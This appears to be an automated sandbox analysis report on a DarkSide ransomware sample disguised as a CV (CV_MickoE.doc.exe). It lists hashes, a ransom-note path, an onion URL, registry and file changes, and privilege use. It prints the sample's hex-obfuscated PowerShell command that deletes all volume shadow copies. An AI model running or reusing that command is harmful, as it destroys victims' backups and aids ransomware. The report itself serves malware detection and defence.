Analysis
-
max time kernel
50s -
max time network
112s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
29-07-2021 19:42
Static task
static1
Behavioral task
behavioral1
Sample
CV_MickoE.doc.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
CV_MickoE.doc.exe
Resource
win10v20210408
General
-
Target
CV_MickoE.doc.exe
-
Size
30KB
-
MD5
f00aded4c16c0e8c3b5adfc23d19c609
-
SHA1
86ca4973a98072c32db97c9433c16d405e4154ac
-
SHA256
4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a
-
SHA512
a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf
Malware Config
Extracted
C:\\README.21b2020d.TXT
darkside
http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
CV_MickoE.doc.exedescription ioc process File renamed C:\Users\Admin\Pictures\SendRemove.crw => C:\Users\Admin\Pictures\SendRemove.crw.21b2020d CV_MickoE.doc.exe File opened for modification C:\Users\Admin\Pictures\SendRemove.crw.21b2020d CV_MickoE.doc.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
CV_MickoE.doc.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\21b2020d.BMP" CV_MickoE.doc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\21b2020d.BMP" CV_MickoE.doc.exe -
Modifies Control Panel 1 IoCs
Processes:
CV_MickoE.doc.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallpaperStyle = "10" CV_MickoE.doc.exe -
Modifies registry class 5 IoCs
Processes:
CV_MickoE.doc.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d CV_MickoE.doc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d\ = "21b2020d" CV_MickoE.doc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon CV_MickoE.doc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d CV_MickoE.doc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\21b2020d.ico" CV_MickoE.doc.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 4816 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exeCV_MickoE.doc.exepid process 3688 powershell.exe 3688 powershell.exe 3688 powershell.exe 532 CV_MickoE.doc.exe 532 CV_MickoE.doc.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
CV_MickoE.doc.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 532 CV_MickoE.doc.exe Token: SeSecurityPrivilege 532 CV_MickoE.doc.exe Token: SeTakeOwnershipPrivilege 532 CV_MickoE.doc.exe Token: SeLoadDriverPrivilege 532 CV_MickoE.doc.exe Token: SeSystemProfilePrivilege 532 CV_MickoE.doc.exe Token: SeSystemtimePrivilege 532 CV_MickoE.doc.exe Token: SeProfSingleProcessPrivilege 532 CV_MickoE.doc.exe Token: SeIncBasePriorityPrivilege 532 CV_MickoE.doc.exe Token: SeCreatePagefilePrivilege 532 CV_MickoE.doc.exe Token: SeBackupPrivilege 532 CV_MickoE.doc.exe Token: SeRestorePrivilege 532 CV_MickoE.doc.exe Token: SeShutdownPrivilege 532 CV_MickoE.doc.exe Token: SeDebugPrivilege 532 CV_MickoE.doc.exe Token: SeSystemEnvironmentPrivilege 532 CV_MickoE.doc.exe Token: SeRemoteShutdownPrivilege 532 CV_MickoE.doc.exe Token: SeUndockPrivilege 532 CV_MickoE.doc.exe Token: SeManageVolumePrivilege 532 CV_MickoE.doc.exe Token: 33 532 CV_MickoE.doc.exe Token: 34 532 CV_MickoE.doc.exe Token: 35 532 CV_MickoE.doc.exe Token: 36 532 CV_MickoE.doc.exe Token: SeDebugPrivilege 3688 powershell.exe Token: SeBackupPrivilege 2152 vssvc.exe Token: SeRestorePrivilege 2152 vssvc.exe Token: SeAuditPrivilege 2152 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
CV_MickoE.doc.exedescription pid process target process PID 532 wrote to memory of 3688 532 CV_MickoE.doc.exe powershell.exe PID 532 wrote to memory of 3688 532 CV_MickoE.doc.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\CV_MickoE.doc.exe"C:\Users\Admin\AppData\Local\Temp\CV_MickoE.doc.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.21b2020d.TXT1⤵
- Opens file in notepad (likely ransom note)
PID:4816
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
MD5
d9dad5afb4a4028a41abb263b74f1e0b
SHA1b54516ecd6dd3041c5c73b7bcf481aa35d63a236
SHA25668b4ad5104e82fe19fdb4a05254bfeb7192c31bd28aef0e3fd55897f6e47a048
SHA512c31c8682e8fd4bf549c6d343de140abff7f1eca8983132e229322e30c03cfe0d811a24b78917cdc3bd8a99b0c2b8f4b4337945122f60b7a2f4847c0340dec175
-
MD5
f418a249405444da33cc73b402a26306
SHA11a6c493e74036f93f0dae4b65e6c543c213ce418
SHA256b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09
SHA512b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf